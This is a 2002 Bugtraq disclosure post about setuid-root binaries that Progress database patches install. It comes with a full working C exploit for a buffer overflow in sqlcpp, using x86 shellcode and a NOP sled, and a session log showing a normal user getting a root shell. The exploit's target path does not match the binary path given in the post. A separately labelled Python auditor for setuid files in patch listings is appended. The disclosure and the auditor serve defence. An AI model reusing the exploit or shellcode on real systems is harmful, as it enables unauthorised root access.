Progress Setuid patch Installs (Happy Easter or April fools to Progress)


Date: Mon, 01 Apr 2002 12:28:55 -0500
From: KF <dotslash@snosoft.com>
To: bugtraq <bugtraq@security-focus.com>,
Subject: Progress Setuid patch Installs  (Happy Easter or April fools to Progress)

http://online.securityfocus.com/archive/82/263602

I sent this out a week or so ago to vuln-dev ... there was never a BID 
number written up on it so I figured I would stress the problem again. I 
mailed this to Progress tech support and they failed to respond as usual, 
so maybe this will get them in gear.
It's not like I haven't told them how to fix this at least once.

[root@ghetto finished]# ls -al /usr/dlc/bin/sqlcpp
-rwsrwsr-x    1 root     root      2220918 Oct 23 08:59 /usr/dlc/bin/sqlcpp

Progress likes to include a lot of suids in their patches... and they 
GIVE them to you even if you don't use the software.
sqlcpp was NOT part of my install until I patched my box. Thanks for the 
root security hole guys and STOP using p_stcopy()!

[root@localhost root]# tar tzvf 91C09.tar.Z  | grep ws
-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
-rwsrwxr-x patchbld/rdl 1540931 2002-02-26 08:16:52 bin/_mprshut
-rwsrwxr-x patchbld/rdl  413694 2002-02-26 08:16:53 bin/_orasrv
-rwsrwxr-x patchbld/rdl 4770560 2002-02-26 08:16:56 bin/_proapsv
-rwsrwxr-x patchbld/rdl  268161 2002-02-26 08:16:57 bin/_probrkr
-rwsrwxr-x patchbld/rdl 4260172 2002-02-26 08:17:00 bin/_probuild
-rwsrwxr-x patchbld/rdl 4614600 2002-02-26 08:17:05 bin/_progres
-rwsrwxr-x patchbld/rdl  311275 2002-02-26 08:17:06 bin/_prooibk
-rwsrwxr-x patchbld/rdl 2220962 2002-02-26 08:17:08 bin/_prooidv
-rwsrwxr-x patchbld/rdl 1692954 2002-02-26 08:17:10 bin/_proutil
-rwsrwxr-x patchbld/rdl 1126861 2002-02-26 08:17:12 bin/_rfutil
-rwsrwxr-x patchbld/rdl 4580488 2002-02-26 08:17:26 bin/orarx
-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp

Much thanks to "The Itch" and his great work.

[dotslash@ghetto misc]$ id
uid=501(dotslash) gid=501(dotslash) groups=501(dotslash)
[dotslash@ghetto misc]$ cc -o sqlcppx sqlcppx.c
[dotslash@ghetto misc]$ ./sqlcppx
/usr/dlc/bin/sqlcpp
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffae4
Using buffersize    : 60
sh-2.05# id
uid=0(root) gid=501(dotslash) groups=501(dotslash)

-KF


Attachment: sqlcppx.c

/*
 * Yet another Progress Database exploit (version ??)
 *
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslash@snosoft.com if you are interested in contributing research time
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more than 56 bytes into the buffer at the command line
 *     (56 to overwrite ebp, 60 to overwrite eip).
 * 2). If you write more than 65 bytes, other frames will be overwritten afterwards and will mess up
 *     your flow of arbitrary code execution.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* strlen, memcpy */
#include <unistd.h>     /* execl */

#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

#define DEFAULT_BUFFER_SIZE 60

char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[])
{
        char *buff;
        char *egg;
        char *ptr;
        long *addr_ptr;
        int bsize = DEFAULT_BUFFER_SIZE;
        int eggsize = DEFAULT_EGG_SIZE;
        int i;
        /* 32-bit x86 only: the address of a local variable stands in for
         * the current stack pointer and is used as the return address */
        int get_sp = (int)&get_sp;

        /* optional argument: size of the command-line argument to build */
        if(argc > 1) { bsize = atoi(argv[1]); }

        if(!(buff = malloc(bsize)))
        {
                printf("unable to allocate memory for %d bytes\n", bsize);
                exit(1);
        }

        if(!(egg = malloc(eggsize)))
        {
                printf("unable to allocate memory for %d bytes\n", eggsize);
                exit(1);
        }

        printf("/usr/dlc/bin/sqlcpp\n");
        printf("Vulnerability found by KF / http://www.snosoft.com\n");
        printf("Coded by The Itch / http://www.promisc.org\n\n");
        printf("Using return address: 0x%x\n", get_sp);
        printf("Using buffersize    : %d\n", bsize);

        /* fill the whole argument with copies of the return address */
        ptr = buff;
        addr_ptr = (long *) ptr;
        for(i = 0; i < bsize; i+=4) { *(addr_ptr++) = get_sp; }

        /* NOP sled followed by the shellcode, passed in the environment as EGG= */
        ptr = egg;
        for(i = 0; i < eggsize - strlen(shellcode) -1; i++)
        {
                *(ptr++) = NOP;
        }

        for(i = 0; i < strlen(shellcode); i++)
        {
                *(ptr++) = shellcode[i];
        }

        egg[eggsize - 1] = '\0';
        memcpy(egg, "EGG=", 4);
        putenv(egg);

        /* execl() requires a (char *)NULL terminator, not a bare 0 */
        execl("/usr/dlc/sqlcpp", "sqlcpp", buff, (char *)NULL);

        return 0;
}
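The complaint in the post is that a vendor patch quietly drops setuid-root binaries onto the box, including ones the site never used, and the `ls -al` line shows the installed sqlcpp is group-writable on top of being setuid root. The following is an added example, not part of KF's post, the attached exploit, or any Progress tooling: a Python auditor that parses the long-listing formats of `tar tvf` and `ls -l`, picks out regular files carrying the setuid or setgid bit, reports which of them are absent from a pre-patch inventory, and flags privileged files that are also group- or world-writable. The listing mixes lines taken from the post with constructed ones (README, _sgidtool, the symlink); the pre-patch inventory is constructed as well.

```python
"""Audit setuid/setgid content in a vendor patch before installing it.

Added example (not from KF's post or from Progress): parses `tar tvf` and
`ls -l` long listings, picks out regular files with the setuid or setgid
bit, diffs them against a pre-patch inventory, and flags privileged files
that are also group- or world-writable.
"""
import re
from dataclasses import dataclass

# Mode string such as -rwsrwxr-x: file type, then user/group/other triplets.
MODE = r"^(?P<mode>[-bcdlps][-rwxsStT]{9})"

# GNU `tar tvf` line: mode owner/group size date time path
TAR_RE = re.compile(MODE + r"\s+(?P<owner>\S+)\s+\d+\s+\S+\s+\S+\s+(?P<path>.+)$")

# `ls -l` line: mode links user group size month day time|year path
LS_RE = re.compile(MODE + r"\s+\d+\s+(?P<user>\S+)\s+(?P<group>\S+)\s+\d+"
                   r"\s+\S+\s+\S+\s+\S+\s+(?P<path>.+)$")

# Constructed sample: three lines copied from the post's 91C09.tar.Z listing
# plus constructed entries (README, _sgidtool, the symlink) for contrast.
PATCH_LISTING = """\
-rwsrwxr-x patchbld/rdl 1001997 2002-02-26 08:16:49 bin/_dbutil
-rwsrwxr-x patchbld/rdl 1124797 2002-02-26 08:16:51 bin/_mprosrv
-rw-r--r-- patchbld/rdl    4096 2002-02-26 08:16:50 bin/README
-rwxr-sr-x patchbld/rdl    4321 2002-02-26 08:17:31 bin/_sgidtool
-rwsrwxr-x patchbld/rdl 2222278 2002-02-26 08:17:30 bin/sqlcpp
lrwxrwxrwx patchbld/rdl       0 2002-02-26 08:17:32 bin/dbutil -> bin/_dbutil
"""

# Constructed pre-patch inventory: the setuid files recorded before patching.
PRE_PATCH_SETUID = {"bin/_dbutil", "bin/_mprosrv"}

# The post's ls -al line for the installed binary, exercising the second format.
INSTALLED_LINE = "-rwsrwsr-x    1 root     root      2220918 Oct 23 08:59 /usr/dlc/bin/sqlcpp"


@dataclass(frozen=True)
class Entry:
    mode: str
    owner: str
    path: str

    @property
    def is_regular(self) -> bool:
        return self.mode[0] == "-"

    @property
    def setuid(self) -> bool:
        return self.mode[3] in "sS"

    @property
    def setgid(self) -> bool:
        return self.mode[6] in "sS"

    @property
    def writable_by_others(self) -> bool:
        # group- or world-writable: anyone in that set can replace the binary
        return self.mode[5] == "w" or self.mode[8] == "w"


def _strip_link(path: str) -> str:
    # symlink entries print "name -> target"; keep only the name
    return path.split(" -> ", 1)[0]


def parse_line(line: str):
    """Return an Entry for a tar or ls long-listing line, or None if neither."""
    m = TAR_RE.match(line)
    if m:
        return Entry(m["mode"], m["owner"], _strip_link(m["path"]))
    m = LS_RE.match(line)
    if m:
        return Entry(m["mode"], m["user"] + "/" + m["group"], _strip_link(m["path"]))
    return None


def parse_listing(text: str):
    return [e for e in map(parse_line, text.splitlines()) if e is not None]


def audit(text: str, baseline):
    """Summarise privileged regular files in a listing against a pre-patch baseline."""
    priv = [e for e in parse_listing(text) if e.is_regular and (e.setuid or e.setgid)]
    return {
        "privileged": sorted(e.path for e in priv),
        "new": sorted(e.path for e in priv if e.path not in baseline),
        "writable": sorted(e.path for e in priv if e.writable_by_others),
    }


if __name__ == "__main__":
    for key, paths in audit(PATCH_LISTING, PRE_PATCH_SETUID).items():
        print(f"{key:>10}: {', '.join(paths) or '-'}")
    e = parse_line(INSTALLED_LINE)
    print(f" installed: {e.path} setuid={e.setuid} setgid={e.setgid} "
          f"writable={e.writable_by_others}")
```

Run against a real patch with `tar tzvf 91C09.tar.Z | python3 audit.py` after swapping the constructed listing for `sys.stdin.read()`; the "new" list is what to review before installing, and anything in "writable" should be chmod'ed down regardless of whether the binary itself is exploitable.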



